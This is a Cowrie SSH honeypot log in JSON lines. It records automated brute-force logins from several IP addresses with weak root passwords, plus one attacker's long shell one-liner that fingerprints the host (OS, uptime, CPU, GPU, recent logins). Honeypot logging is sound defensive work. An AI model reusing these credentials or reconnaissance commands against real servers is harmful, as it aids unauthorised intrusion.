{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:02:29.439247Z","src_ip":"212.227.235.229","session":"7e378bc1a9ce"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:02:29.440786Z","src_ip":"212.227.235.229","session":"7e378bc1a9ce"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:02:29.960731Z","src_ip":"83.168.105.65","session":"794846133e5f"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":54684,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b7be7dc3c88","protocol":"ssh","message":"New connection: 83.168.105.65:54684 (1.2.3.4:22) [session: 5b7be7dc3c88]","sensor":"my-vps","timestamp":"2025-08-26T12:02:44.181124Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:02:44.181969Z","src_ip":"83.168.105.65","session":"5b7be7dc3c88"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:02:44.221385Z","src_ip":"83.168.105.65","session":"5b7be7dc3c88"}
{"eventid":"cowrie.login.success","username":"root","password":"AA123456","message":"login attempt [root/AA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:02:44.340951Z","src_ip":"83.168.105.65","session":"5b7be7dc3c88"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:02:44.485179Z","src_ip":"83.168.105.65","session":"5b7be7dc3c88"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:02:44.485844Z","src_ip":"83.168.105.65","session":"5b7be7dc3c88"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:02:44.526040Z","src_ip":"83.168.105.65","session":"5b7be7dc3c88"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:02:44.527276Z","src_ip":"83.168.105.65","session":"5b7be7dc3c88"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38356,"dst_ip":"1.2.3.4","dst_port":22,"session":"391cb0e17205","protocol":"ssh","message":"New connection: 196.251.86.249:38356 (1.2.3.4:22) [session: 391cb0e17205]","sensor":"my-vps","timestamp":"2025-08-26T12:02:57.938129Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:02:58.601447Z","src_ip":"196.251.86.249","session":"391cb0e17205"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:02:58.613021Z","src_ip":"196.251.86.249","session":"391cb0e17205"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":33890,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b54435bdee7","protocol":"ssh","message":"New connection: 83.168.105.65:33890 (1.2.3.4:22) [session: 0b54435bdee7]","sensor":"my-vps","timestamp":"2025-08-26T12:02:59.664685Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:02:59.665731Z","src_ip":"83.168.105.65","session":"0b54435bdee7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:02:59.702917Z","src_ip":"83.168.105.65","session":"0b54435bdee7"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ@WSX","message":"login attempt [root/!QAZ@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:02:59.815357Z","src_ip":"83.168.105.65","session":"0b54435bdee7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:02:59.912197Z","src_ip":"83.168.105.65","session":"0b54435bdee7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:02:59.913002Z","src_ip":"83.168.105.65","session":"0b54435bdee7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60514,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9a4a7e08fcb","protocol":"ssh","message":"New connection: 212.227.235.229:60514 (1.2.3.4:22) [session: e9a4a7e08fcb]","sensor":"my-vps","timestamp":"2025-08-26T12:02:59.914802Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:02:59.951059Z","src_ip":"83.168.105.65","session":"0b54435bdee7"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:02:59.952110Z","src_ip":"83.168.105.65","session":"0b54435bdee7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:03:00.432082Z","src_ip":"212.227.235.229","session":"e9a4a7e08fcb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:03:00.432853Z","src_ip":"212.227.235.229","session":"e9a4a7e08fcb"}
{"eventid":"cowrie.login.failed","username":"git","password":"q1w2e3","message":"login attempt [git/q1w2e3] failed","sensor":"my-vps","timestamp":"2025-08-26T12:03:00.969123Z","src_ip":"196.251.86.249","session":"391cb0e17205"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:03:02.156133Z","src_ip":"196.251.86.249","session":"391cb0e17205"}
{"eventid":"cowrie.login.success","username":"root","password":"000000","message":"login attempt [root/000000] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:03:03.023416Z","src_ip":"212.227.235.229","session":"e9a4a7e08fcb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:03:04.202433Z","src_ip":"212.227.235.229","session":"e9a4a7e08fcb"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T12:03:04.203135Z","src_ip":"212.227.235.229","session":"e9a4a7e08fcb"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T12:03:04.203757Z","src_ip":"212.227.235.229","session":"e9a4a7e08fcb"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T12:03:04.204790Z","src_ip":"212.227.235.229","session":"e9a4a7e08fcb"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T12:03:04.206047Z","src_ip":"212.227.235.229","session":"e9a4a7e08fcb"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T12:03:04.206698Z","src_ip":"212.227.235.229","session":"e9a4a7e08fcb"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T12:03:04.207412Z","src_ip":"212.227.235.229","session":"e9a4a7e08fcb"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T12:03:04.208719Z","src_ip":"212.227.235.229","session":"e9a4a7e08fcb"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T12:03:04.209232Z","src_ip":"212.227.235.229","session":"e9a4a7e08fcb"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T12:03:04.209997Z","src_ip":"212.227.235.229","session":"e9a4a7e08fcb"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T12:03:04.210419Z","src_ip":"212.227.235.229","session":"e9a4a7e08fcb"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T12:03:04.211116Z","src_ip":"212.227.235.229","session":"e9a4a7e08fcb"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T12:03:04.211527Z","src_ip":"212.227.235.229","session":"e9a4a7e08fcb"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T12:03:04.703484Z","src_ip":"212.227.235.229","session":"e9a4a7e08fcb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:03:04.704401Z","src_ip":"212.227.235.229","session":"e9a4a7e08fcb"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:03:04.705478Z","src_ip":"212.227.235.229","session":"e9a4a7e08fcb"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":35206,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0eee6460b9d","protocol":"ssh","message":"New connection: 83.168.105.65:35206 (1.2.3.4:22) [session: c0eee6460b9d]","sensor":"my-vps","timestamp":"2025-08-26T12:03:15.057688Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:03:15.058566Z","src_ip":"83.168.105.65","session":"c0eee6460b9d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:03:15.094652Z","src_ip":"83.168.105.65","session":"c0eee6460b9d"}
{"eventid":"cowrie.login.failed","username":"developer","password":"developer","message":"login attempt [developer/developer] failed","sensor":"my-vps","timestamp":"2025-08-26T12:03:15.205255Z","src_ip":"83.168.105.65","session":"c0eee6460b9d"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:03:16.244168Z","src_ip":"83.168.105.65","session":"c0eee6460b9d"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":35862,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7de78df7143","protocol":"ssh","message":"New connection: 83.168.105.65:35862 (1.2.3.4:22) [session: c7de78df7143]","sensor":"my-vps","timestamp":"2025-08-26T12:03:30.258781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:03:30.259727Z","src_ip":"83.168.105.65","session":"c7de78df7143"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:03:30.296943Z","src_ip":"83.168.105.65","session":"c7de78df7143"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd","message":"login attempt [root/Passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:03:30.408988Z","src_ip":"83.168.105.65","session":"c7de78df7143"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:03:30.502001Z","src_ip":"83.168.105.65","session":"c7de78df7143"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:03:30.502982Z","src_ip":"83.168.105.65","session":"c7de78df7143"}
